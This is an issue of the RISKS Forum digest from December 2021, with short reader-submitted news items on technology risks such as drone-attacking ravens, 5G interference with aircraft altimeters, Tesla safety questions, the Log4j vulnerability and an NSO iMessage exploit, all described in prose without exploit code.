Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
precedence: bulk
Subject: Risks Digest 32.96

RISKS-LIST: Risks-Forum Digest  Wednesday 28 December 2021  Volume 32 : Issue 96

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, founder and still moderator

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
  <http://catless.ncl.ac.uk/Risks/32.96>
The current issue can also be found at
  <http://www.csl.sri.com/users/risko/risks.txt>

  Contents:
Wing Resumes Drone Deliveries in Canberra After Raven Attacks Forced Pause
 During Nesting Season (ABC Australia)
The human factor fails and is caught in U.S. nuclear plant inspections
 (NBC12)
The CIA Is Deep Into Cryptocurrency, Director Reveals (Vice)
U.S. FAA Issues Draft Airworthiness Directives Highlighting impact of 5G on
 Radar Altimeters (FAA)
AWS us-east-1 outage brings down services around the world
 (DatacenterDynamics)
Google finally knows which app to blame for Android's mysterious
 can't-call-911 bug (Android Police)
'The Beatles: Get Back' shows that deepfake tech isn't always evil (ZDNet)
Inside Tesla as Elon Musk Pushed an Unflinching Vision for Self-Driving Cars
 (NYTimes)
A New Tesla Safety Concern: Drivers Can Play Video Games in Moving Cars
 (NYTimes)
log4j (collected from Dan Goodin and others)
A $92,000 flying car can reach speeds of 63 miles per hour
 (Business Insider)
Researchers unveil new cyber-protections against "logic bombs" (techxplore)
Researchers Made a Camera That's the Size of a Grain of Salt (Vice)
A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution
 (Goggle Project Zero)
Twitter Spaces is being used by the Taliban and white nationalists
 (WashPost)
Next year's Android smartphones will be watching you (The Verge)
Re: Australia's AI Cameras Catch Over 270,000 Drivers Using Phones
 (Nic Fulton)
Abridged info on RISKS (comp.risks)

----------------------------------------------------------------------

Date: Wed, 15 Dec 2021 12:28:01 -0500 (EST)
From: ACM TechNews <technews-editor@acm.org>
Subject: Wing Resumes Drone Deliveries in Canberra After Raven Attacks
 Forced Pause  During Nesting Season (ABC Australia)

Markus Mannheim, ABC News Australia 10 Dec 2021
via ACM TechNews, Wednesday, December 15, 2021

Alphabet's Wing subsidiary has relaunched drone-based coffee and fast food
deliveries to the Harrison suburb of Canberra, Australia, following the
service's suspension in September due to attacks by nesting
ravens. Ornithologist Neil Hermes discovered a pair of ravens had a nest
with three chicks in a tree near a Wing customer; the ravens were
approaching the drones from behind, as they would if the drone were a
predator and they were trying to encourage it to leave. The service
restarted after the chicks had fledged (grown wing feathers large enough for
flight). Said Hermes, "We certainly need to be careful to ensure that we're
aware of the impacts [of what we're doing]."
https://orange.hosting.lsoft.com/trk/click?ref=znwrbbrs9_6-2d9e6x230174x072181&

------------------------------

Date: Mon, 13 Dec 2021 17:08:24 -0800
From: "Rob Wilcox" <robwilcoxjr@gmail.com>
Subject: The human factor fails and is caught in U.S. nuclear plant
 inspections (NBC12)

https://www.nbc12.com/2021/12/13/former-inspector-virginia-nuclear-plant-pleads-guilty-falsifying-inspection-reports/

Former inspector of Virginia nuclear plant pleads guilty of falsifying
inspection reports
[image: North Anna Nuclear Power Station. (Source: Dominion Virginia Power)]
North Anna Nuclear Power Station. (Source: Dominion Virginia Power)
NBC12 Newsroom 13 Dec 2021 and updated

LOUISA Co., Va. (WWBT) - The former senior resident inspector of the North
Anna Nuclear Power Station pleaded guilty to making false statements on
inspection reports.

Sixty-year-old Gregory Croon of Tennessee worked for the U.S. Nuclear
Regulatory Commission (NRC) and was working at the North Anna plant between
2016 and 2018.

On Monday, Croon pleaded guilty to falsifying inspection reports in federal
court.

``The accuracy of NRC inspection reports is critical to the NRC's oversight
of licensees' safe operation of nuclear power plants around the nation,''
said NRC Inspector General Robert J. Feitel.  ``Croon's false statements
could have jeopardized that safety oversight function.''

Federal officials did not say if there were any short or long-term safety
concerns following the investigation, only that the false reports could
have jeopardized the safety oversight of the plant.

``The combined efforts of the NRC OIG special agents and our law enforcement
partners yielded an appropriate and just result in this case. Nonetheless,
it is vital to remember that we must all remain vigilant, watch for
fraudulent activity, and report it promptly,''

Croon will be sentenced in March.

------------------------------

Date: Tue, 7 Dec 2021 12:14:59 -1000
From: geoff goodfellow <geoff@iconia.com>
Subject: The CIA Is Deep Into Cryptocurrency, Director Reveals (Vice)

*CIA Director William Burns said the agency has "a number of different
projects focused on cryptocurrency" on the go.*

There's a long-running conspiracy theory among a small number of
cryptocurrency enthusiasts that Bitcoin's anonymous inventor, Satoshi
Nakamoto, was actually the CIA or another three-lettered agency. That fringe
theory is having a fresh day in the sun after CIA Director William Burns
said on Monday that the intelligence agency has "a number of different
projects focused on cryptocurrency" on the go.

Burns made his comments at the tail end of a talk at the Wall Street Journal
's CEO Summit.  After discussing everything from the possible Russian
invasion of Ukraine to the challenges of space, someone in the audience
asked if the agency is on top of cryptocurrencies, which are currently at
the center of the ransomware epidemic that U.S. officials are attempting to
get a handle on and stamp out. Here's what Burns said:
<https://www.wsj.com/video/events/cia-director-on-today-global-challenges/C60765B3-8C1C-495F-8094-99E64C6637A5.html>

"This is something I inherited. My predecessor had started this, but had set
in motion a number of different projects focused on cryptocurrency and
trying to look at second- and third-order consequences as well and helping
with our colleagues in other parts of the U.S. government to provide solid
intelligence on what we're seeing as well."

This is hardly surprising given the focus ransomware is getting from every
corner of government. This year, a ransomware attack targeting a pipeline
company led to a shutdown, panic buying, and a gas shortage in several states.
<https://www.vice.com/en/article/dyvpyw/everything-you-need-to-know-about-the-pipeline-hack>

Cryptocurrencies "could have enormous impact on everything from ransomware
attacks, as you mentioned, because one of the ways of getting at ransomware
attacks and deterring them is to be able to get at the financial networks
that so many of those criminal networks use and that gets right at the
issue of digital currencies as well," Burns said.  [...]

https://www.vice.com/en/article/dyp7vw/the-cia-is-deep-into-cryptocurrency-director-reveals

------------------------------

Date: Wed, 8 Dec 2021 19:50:30 -0000
From: "paul cornish" <paul.a.cornish@googlemail.com>
Subject: U.S. FAA Issues Draft Airworthiness Directives Highlighting impact
 of 5G on Radar Altimeters (FAA)

On 7 Dec 2021 the U.S. federal Aviation Administration issued draft
Airworthiness Directives related to possible interference between 5G
telecoms (including 5G handsets) and aircraft Radar altimeters.

This AD was prompted by a determination that radio altimeters cannot be
relied upon to perform their intended function if they experience
interference from wireless broadband operations in the 3.7-3.98 GHz
frequency band as used by 5G.

It is based on a world wide task force managed by RTCA.  It found that:

1. The likelihood and severity of radio frequency interference increases
   for operations at lower altitudes.

2. That interference could cause the radio altimeter to either become
   inoperable or present misleading information

The FAA determined that, at this time, no information has been presented
that shows radio altimeters are not susceptible to interference caused by
C-Band emissions permitted in the United States.  The FAA will examine all
airports across the U.S. to identify those with nearby 5G base stations and
will issue NOTAMs advising of the issues.

As background the radio altimeter is more precise than a barometric
altimeter and for that reason is used where aircraft height over the ground
needs to be precisely measured, such as auto-land or other low altitude or
low-viz operations.  It also feeds accurate height data to auto-pilot and
auto landing systems.  So it looks like just when the radar altimeter must
be performing at its absolute best (ie near the ground) it could be impacted
by 5G transmissions which could severely impact the safe flight of the
aircraft.

For more info see https://www.faa.gov/newsroom/faa-statement-5g and its
attachments.   [Also noted by Monty Solomon.  PGN]

------------------------------

Date: Tue, 7 Dec 2021 10:21:43 -0800
From: "Lauren Weinstein" <lauren@vortex.com>
Subject: AWS us-east-1 outage brings down services around the world
 (DatacenterDynamics)

https://www.datacenterdynamics.com/en/news/aws-us-east-1-outage-brings-down-services-around-the-world/

------------------------------

Date: Wed, 8 Dec 2021 16:15:27 -0800
From: "Lauren Weinstein" <lauren@vortex.com>
Subject: Google finally knows which app to blame for Android's mysterious
 can't-call-911 bug (Android Police)

I think it's very notable that a LANDLINE saved the day. No apps to
confuse them. They just work.  LW

https://www.androidpolice.com/google-finally-knows-which-app-to-blame-for-androids-mysterious-cant-call-911-bug/

------------------------------

Date: Wed, 8 Dec 2021 00:11:21 -0500
From: "Gabe Goldberg" <gabe@gabegold.com>
Subject: 'The Beatles: Get Back' shows that deepfake tech isn't always evil
 (ZDNet)

The machine learning technology used here is very similar (if not
identical) to what has been used in the past for deepfakes, making fake
video look and sound real. A prime example of this is the Emmy
Award-winning demonstration video produced by MIT's Center for Advanced
Virtuality, "In Event of Moon Disaster," which depicts then-president
Nixon reading a prepared statement that the Apollo 11 astronauts had
perished in a catastrophe. To create it, MIT used Nixon's likeness and
speech from television appearances and fed it into a machine learning
system to synthesize the audio and video and produce the uncanny film.

The demonstration is a warning that these technologies can be used for
nefarious purposes. There are currently efforts underway, such as with
the Coalition for Content Provenance and Authenticity (C2PA), to create
standards for providing context and history for digital media to prove
the authenticity for a particular image or video/audio stream in the
future can be established, as it is expected that these technologies
will be used much more heavily in the future.

So can this deepfake technology be used for evil? Yes. But if Get Back
proves anything, it shows it can be used for "deep restoration" as well.
A great deal of vintage content can be repaired in this way, be it
original films or archival footage that can make it look brand new again
-- or the freshest they have ever looked and shown on modern content
delivery platforms.

https://www.zdnet.com/article/the-beatles-get-back-shows-that-deepfake-tech-isnt-always-evil/

--
Gabriel Goldberg, Computers and Publishing, Inc.       gabe@gabegold.com
3401 Silver Maple Place, Falls Church, VA 22042           (703) 204-0433
LinkedIn: http://www.linkedin.com/in/gabegold            Twitter: GabeG0

------------------------------

Date: Tue, 7 Dec 2021 01:23:50 -0500
From: "Gabe Goldberg" <gabe@gabegold.com>
Subject: Inside Tesla as Elon Musk Pushed an Unflinching Vision for
 Self-Driving Cars (NYTimes)

In addition, some who have long worked on autonomous vehicles for other
companies — as well as seven former members of the Autopilot team — have
questioned Tesla's practice of constant modifications to Autopilot and
F.S.D., pushed out to drivers through software updates, saying it can be
hazardous because buyers are never quite sure what the system can and
cannot do.

https://www.nytimes.com/2021/12/06/technology/tesla-autopilot-elon-musk.html

------------------------------

Date: Tue, 7 Dec 2021 14:10:10 -0500
From: "Gabe Goldberg" <gabe@gabegold.com>
Subject: A New Tesla Safety Concern: Drivers Can Play Video Games in Moving
 Cars (NYTimes)

The feature raises fresh questions about whether Tesla is compromising
safety as it rushes to add new technologies.

Not long after buying a Tesla Model 3 this summer, Vince Patton saw a
YouTube clip highlighting a feature that took him by surprise: three
video games that can be played on the large touch screen mounted in
front of the dashboard — while driving down the road.

“I thought surely that can’t be right,” Mr. Patton, a retiree in Lake
Oswego, Ore.

But in a parking lot, he gave it a try, and he was able to play a
solitaire game on the Model 3 while in motion. “I only did it for like
five seconds and then turned it off,” he said. “I’m astonished. To me,
it just seems inherently dangerous.”

The automaker added the games in an over-the-air software update that
was sent to most of its cars this summer. They can be played by a driver
or by a passenger in full view of the driver, raising fresh questions
about whether Tesla is compromising safety as it rushes to add new
technologies and features in its cars.

https://www.nytimes.com/2021/12/07/business/tesla-video-game-driving.html

Tesla, not playing with a full deck...

------------------------------

Date: Thu, 16 Dec 2021 11:39:31 PST
From: Peter G Neumann <neumann@csl.sri.com>
Subject: log4j (collected from Dan Goodin and others)

U.S. Cert:

Security experts around the world raced Friday, Dec. 10, 2021, to patch one
of the worst computer vulnerabilities discovered in years, a critical flaw
in open-source code widely used across industry and government in cloud
services and enterprise software. Cybersecurity experts say users of the
online game Minecraft have already exploited it to breach other users by
pasting a short message into in a chat box. Credit: AP Photo/Damian
Dovarganes, File Security experts around the world raced Friday to patch one
of the worst computer vulnerabilities discovered in years, a critical flaw
in open-source code widely used across industry and government in cloud
services and enterprise software.

"I'd be hard-pressed to think of a company that's not at risk," said Joe
Sullivan, chief security officer for Cloudflare, whose online infrastructure
protects websites from malicious actors. Untold millions of servers have
it installed, and experts said the fallout would not be known for several
days.

https://us-cert.cisa.gov/ncas/current-activity/2021/12/10/apache-releases-log4j-version-2150-address-critical-rce

 - - - -

Monty Solomon <monty@roscom.com>:
Hackers launch over 840,000 attacks through Log4J flaw

https://arstechnica.com/information-technology/2021/12/hackers-launch-over-840000-attacks-through-log4j-flaw/

 - - - -

Monty Solomon <monty@roscom.com>
As Log4Shell wreaks havoc, payroll service reports ransomware attack

https://arstechnica.com/information-technology/2021/12/as-log4shell-wreaks-havoc-payroll-service-reports-ransomware-attack/

 - - - -

Dan Goodin, Ars Techica, 9 Dec 2021
Zero-day in ubiquitous Log4j tool poses a grave threat to the Internet
Minecraft is the first, but certainly not the last, app known to be affected.

<https://arstechnica.com/information-technology/2021/12/minecraft-and-other-apps-face-serious-threat-from-new-code-execution-bug/>

Exploit code has been released for a serious code-execution vulnerability in
Log4j, an open source logging utility that's used in countless apps,
including those used by large enterprise organizations, several websites
reported last Thursday.

Word of the vulnerability first came to light on sites catering to users of
Minecraft, the best-selling game of all time. The sites warned that hackers
could execute malicious code on servers or clients running the Java version
of Minecraft by manipulating log messages, including from things typed in
chat messages. The picture became more dire still as Log4j was identified as
the source of the vulnerability, and exploit code was discovered posted
online.

A big deal

``The Minecraft side seems like a perfect storm, but I suspect we are going
to see affected applications and devices continue to be identified for a
long time,'' HD Moore, founder and CTO of network discovery platform Rumble,
said.  ``This is a big deal for environments tied to older Java runtimes:
Web front ends for various network appliances, older application
environments using legacy APIs, and Minecraft servers, due to their
dependency on older versions for mod compatibility.''

Reports are already surfacing of servers performing Internet-wide scans in
attempts to locate vulnerable servers.  Log4j is incorporated into a host of
popular frameworks, including Apache Struts2, Apache Solr, Apache Druid, and
Apache Flink. That means that a dizzying number of third-party apps may also
be vulnerable to exploits of the same high severity as those threatening

Minecraft users.

At the time this post went live, there wasn't much known about the
vulnerability. One of the few early sources providing a tracking number for
the vulnerability was Github, which said it's CVE-2021-44228. Security firm
Cyber Kendra on late Thursday reported a Log4j RCE Zero day being dropped on
the Internet and concurred with Moore that ``there are currently many
popular systems on the market that are affected.''

The Apache Foundation has yet to disclose the vulnerability, and
representatives there didn't respond to an email. This Apache page does
acknowledge the recent fixing of a serious vulnerability. Moore and other
researchers said the Java deserialization bug stems from Log4j making
network requests through the JNDI to an LDAP server and executing any code
that's returned. The bug is triggered inside of log messages with use of the
${} syntax.

Additional reporting from security firm LunaSec said
that Java versions greater than 6u211, 7u201, 8u191, and 11.0.1 are less
affected by this attack vector, at least in theory, because the JNDI can't
load remote code using LDAP. Hackers may still be able to work around this
by leveraging classes already present in the target application. Success
would depend on whether there are any dangerous gadgets in the process,
meaning newer versions of Java may still prevent code execution but only
depending on the specifics of each application.

LunaSec went on to say that cloud services from Steam and Apple iCloud have
also been found to be affected. Company researchers also pointed out that a
different high-severity vulnerability in struts led to the 2017 compromise
of Equifax, which spilled sensitive details for more than 143 million U.S.
consumers.

Cyber Kendra said that in November the Alibaba Cloud security team disclosed
a vulnerability in Log4j2 -- the successor to Log4j -- that stemmed from
recursive analysis functions, which attackers could exploit by constructing
malicious requests that triggered remote code execution. The firm strongly
urged people to use the latest version of Log4j2 available here.

What it means for Minecraft

The Spigot gaming forum said that Minecraft versions 1.8.8 through the most
current 1.18 release are all vulnerable, as did other popular game servers
such as Wynncraft. Gaming server and news site Hypixel, meanwhile, urged
Minecraft players to take extra care.

``The issue can allow remote access to your computer through the servers you
log into,'' site representatives wrote. ``That means any public server you
go onto creates a risk of being hacked.''

Reproducing exploits for this vulnerability in Minecraft aren't
straightforward because success depends not only on the Minecraft version
running but also on the version of the Java framework the Minecraft app is
running on top of. It appears that older Java versions have fewer built-in
security protections that make exploits easier.  On Friday, Minecraft rolled
out a new game version that fixes the vulnerability.  "We are aware of
recent discussions regarding a public exploitation of a Log4j remote code
execution vulnerability affecting various industry-wide Apache products,"
Microsoft said in a statement. "We've taken steps to keep our customers safe
and protected, which includes rolling out a fix that blocks this issue for
Java Edition 1.18.1. Customers who apply the fix are protected.''

------------------------------

Date: Tue, 7 Dec 2021 12:44:52 -1000
From: geoff goodfellow <geoff@iconia.com>
Subject: A $92,000 flying car can reach speeds of 63 miles per hour
 (Business Insider)

If you've always dreamed of flying to work, that dream may very soon be a
reality.

If you have $92,000, that is.

Companies are always looking for new market niches, and flying cars are
quickly becoming the next big thing.

There are plans for cars that both fly and work on the road and for flying
taxis that will aim to form the basis of future travel.

Jetson is one of these companies.

The company aims "to make the skies available for everyone with our safe
personal electric aerial vehicle," according to its website.

The company's first flying car, Jetson One, is already on sale.

Jetson One has a maximum speed of 63mph thanks to its eight electric motors
which generate 102 horsepower. The car can run continually for 20 minutes.
[...]

https://www.businessinsider.com/new-flying-car-goes-63-mph-20-minutes-costs-92000-2021-12

------------------------------

Date: Sat, 11 Dec 2021 10:17:57 +0800
From: "Richard Stein" <rmstein@ieee.org>
Subject: Researchers unveil new cyber-protections against "logic bombs"
 (techxplore.com)

https://techxplore.com/news/2021-12-unveil-cyber-logic.html

"The researchers looked into Mystique, a new class of attacks on printed
objects that leverage emerging 4D printing technology to introduce embedded
computer code—or logic bombs—by manipulating the manufacturing process.

"Mystique enables visually harmless objects to behave maliciously when a
logic bomb is triggered by a stimulus such as changes in temperature,
moisture, pH or modifications to the materials used initially, potentially
causing catastrophic operational failures when they are used."

4D printing (see https://en.wikipedia.org/wiki/4D_printing) applies 3D
printer technology with "ink" (gels, fibers, polymers, etc.) sensitized to
adjust their shape or material properties in response to environmental
conditions: pH, temperature, stress, humidity, magnetic field, sound level,
etc. The "Mystique" class of defects and vulnerabilities might arise in a
printed structures such as artificial bone or tissue foundation.

The essay discusses means of Mystique-injected defect detection using
CAT scans and material sensors to ensure specified manufactured product
outcome before shipping to a customer.

[Trust that neither the inspection verification measures, nor the
employees with product release approval, are compromised.]

------------------------------

Date: Tue, 7 Dec 2021 12:12:28 -1000
From: geoff goodfellow <geoff@iconia.com>
Subject: Researchers Made a Camera That's the Size of a Grain of Salt (Vice)

*It can take images that are better than existing tech.*

A newly-developed camera the size of a grain of salt can take clear,
full-color images at the level of cameras that are 500,000 times larger.

Researchers at Princeton University and the University of Washington created
a new type of optical system, called a metasurface, to shrink the camera's
hardware down to size, and combined this with machine-learning image
processing that enables the camera to produce clear images in natural
lighting. Previously, micro-cameras could only produce useful images in
perfect laboratory settings, according to the researchers
<https://engineering.princeton.edu/news/2021/11/29/researchers-shrink-camera-size-salt-grain>.
Their work is published in the journal *Nature*.
<https://www.nature.com/articles/s41467-021-26443-0>

Each camera consists of 1.6 million cylindrical posts which interact with
light to produce the images. These posts are as small as the human
immunodeficiency virus (HIV). The surfaces are made from silicon nitride, a
material that makes them compatible with computing microchip manufacturing.
This means they'd be cheaper and faster to produce than current full-size
camera lenses.  [...]

https://www.vice.com/en/article/4awxvg/researchers-made-a-camera-thats-the-size-of-a-grain-of-salt

------------------------------

Date: Wed, 15 Dec 2021 13:33:35 -0500
From: Monty Solomon <monty@roscom.com>
Subject: A deep dive into an NSO zero-click iMessage exploit: Remote Code
 Execution (Goggle Project Zero)

Earlier this year, Citizen Lab managed to capture an NSO iMessage-based
zero-click exploit being used to target a Saudi activist. In this two-part
blog post series we will describe for the first time how an in-the-wild
zero-click iMessage exploit works.

Based on our research and findings, we assess this to be one of the most
technically sophisticated exploits we've ever seen, further demonstrating
that the capabilities NSO provides rival those previously thought to be
accessible to only a handful of nation states.

https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html

------------------------------

Date: Mon, 13 Dec 2021 00:56:14 -0500
From: Gabe Goldberg <gabe@gabegold.com>
Subject: Twitter Spaces is being used by the Taliban and white nationalists
 (WashPost)

Employees who complained about the lack of moderation say they were
sidelined.

https://www.washingtonpost.com/technology/2021/12/10/twitter-turmoil-spaces/

------------------------------

Date: Tue, 7 Dec 2021 10:46:09 -1000
From: geoff goodfellow <geoff@iconia.com>
Subject: Next year's Android smartphones will be watching you (The Verge)

*Qualcomm's new always-on smartphone camera is a potential privacy
nightmare*

Your phone's front camera is always securely looking for your face, even if
you don't touch it or raise to wake it. i That's how Qualcomm Technologies
vice president of product management Judd Heape introduced the company's new
always-on camera capabilities <https://youtu.be/3H6tfcZLHfg?t=10758> in the
Snapdragon 8 Gen 1 processor set to arrive in top-shelf Android phones early
next year.
<https://www.theverge.com/2021/11/30/22809687/qualcomm-snapdragon-8-gen-1-chip-smartphone-processor-specs-details>

Depending on who you are, that statement can either be exciting or
terrifying. For Qualcomm, it thinks this new feature will enable new use
cases, like being able to wake and unlock your phone without having to pick
it up or have it instantly lock when it no longer sees your face.

But for those of us with any sense of how modern technology is used to
violate our privacy, a camera on our phone that’s always capturing images
*even when we’re not using it* sounds like the stuff of nightmares and has a
cost to our privacy that far outweighs any potential convenience benefits.

Qualcomm's main pitch for this feature is for unlocking your phone any time
you glance at it, even if it's just sitting on a table or propped up on a
stand. You don't need to pick it up or tap the screen or say a voice command
-- it just unlocks when it sees your face. I can see this being useful if
your hands are messy or otherwise occupied (in its presentation, Qualcomm
used the example of using it while cooking a recipe to check the next
steps). Maybe you’ve got your phone mounted in your car, and you can just
glance over at it to see driving directions without having to take your
hands off the steering wheel or leave the screen on the entire time.

The company is also spinning it as making your phone *more secure* by
automatically locking the phone when it no longer sees your face or detects
someone looking over your shoulder and snooping on your group chat. It can
also suppress private information or notifications from popping up if you’re
looking at the phone with someone else. Basically, if you're not looking at
it, your phone is locked; if it can see you, it will be unlocked. If it can
see you *and* someone else, it can automatically lock the phone or hide
private information or notifications from displaying on the screen. [...]

https://www.theverge.com/22811740/qualcomm-snapdragon-8-gen-1-always-on-camera-privacy-security-concerns

------------------------------

Date: Wed, 15 Dec 2021 12:57:11 +1100
From: Nic Fulton <nicfulton@gmail.com>
Subject: Re: Australia's AI Cameras Catch Over 270,000 Drivers Using Phones
 (RISKS-32.95)

> You asked "Is it illegal to use your cell-phone for navigation purposes?
> What is the difference between that and a built-in screen for navigation?

https://roadsafety.transport.nsw.gov.au/stayingsafe/mobilephones/know-the-rules.html

has the answer.

You have to mount the phone in an approved cradle.

"2. Can I touch my phone if it is in a cradle?

If your phone is secured in a cradle, you can only touch your phone:

* To make or receive a phone call;
* For audio playing functions; or
* For using a driver's aid (such as navigation)."

I hope this helps. The law is pretty sensible, which is good, I guess.

  [Also noted discursively by Peter Knoppers, also by Simon Wright and John
  Levine, albeit more tersely.  PGN]

------------------------------

Date: Mon, 1 Aug 2020 11:11:11 -0800
From: RISKS-request@csl.sri.com
Subject: Abridged info on RISKS (comp.risks)

 The ACM RISKS Forum is a MODERATED digest.  Its Usenet manifestation is
 comp.risks, the feed for which is donated by panix.com as of June 2011.
=> SUBSCRIPTIONS: The mailman Web interface can be used directly to
 subscribe and unsubscribe:
   http://mls.csl.sri.com/mailman/listinfo/risks

=> SUBMISSIONS: to risks@CSL.sri.com with meaningful SUBJECT: line that
   includes the string `notsp'.  Otherwise your message may not be read.
 *** This attention-string has never changed, but might if spammers use it.
=> SPAM challenge-responses will not be honored.  Instead, use an alternative
 address from which you never send mail where the address becomes public!
=> The complete INFO file (submissions, default disclaimers, archive sites,
 copyright policy, etc.) is online.
   <http://www.CSL.sri.com/risksinfo.html>
 *** Contributors are assumed to have read the full info file for guidelines!

=> OFFICIAL ARCHIVES:  http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
  http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
  Also, ftp://ftp.sri.com/risks for the current volume/previous directories
     or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
  If none of those work for you, the most recent issue is always at
     http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-32.00
  ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
 *** NOTE: If a cited URL fails, we do not try to update them.  Try
  browsing on the keywords in the subject line or cited article leads.
  Apologies for what Office365 and SafeLinks may have done to URLs.
==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

------------------------------

End of RISKS-FORUM Digest 32.96
************************